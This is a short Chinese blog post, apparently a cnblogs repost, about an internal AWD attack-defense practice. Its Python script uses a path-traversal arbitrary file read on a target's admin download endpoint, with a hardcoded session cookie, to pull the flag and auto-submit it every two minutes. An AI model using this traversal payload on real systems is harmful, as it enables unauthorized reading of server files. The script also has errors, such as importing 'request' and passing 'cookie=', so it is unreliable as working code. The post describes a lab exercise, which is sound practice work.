记一次AWD自动获取flag并提交

背景

近期部门内搭建了攻防实验平台供大家练习,周末组织了一波AWD练习,之前都是做渗透测试比较多,加之题目比较简单,找到漏洞getshell拿flag都没问题,只不过如果没找到突破口flag都要手动提交的话,拿分会慢很多。
在过程中发现其实除了getshell后再服务器根目录/下读到flag,其实还可以靶机网站中还存在一个任意文件读取漏洞,那这样写脚本自动flag就简单得多了

自动提交flag的脚本

#! /usr/bin/env python
# coding: utf-8

import os
import time
import request

url = "http://10.233.*.*:800/admin/Database/downFile.html?type=sql&file=../../../../../../../flag"

while True:
    flag = request.get(url,cookie={'skin':'0','PHPSESSID':'18kdkfhsdkfh3323'}).text
    print flag
    url2 = 'http://10.233.*.*:801/flag_file.php?token=team3&flag=%s' %flag
    submit = request.get(url2).text
    print submit
    time.sleep(60*2)    #flag两分钟更新一次

后记

只是想记录一下,flag不一定需要getshell后才能拿到,所以写自动提交flag的脚本也可以是多样的

猜你喜欢

转载自www.cnblogs.com/bingogo/p/12099003.html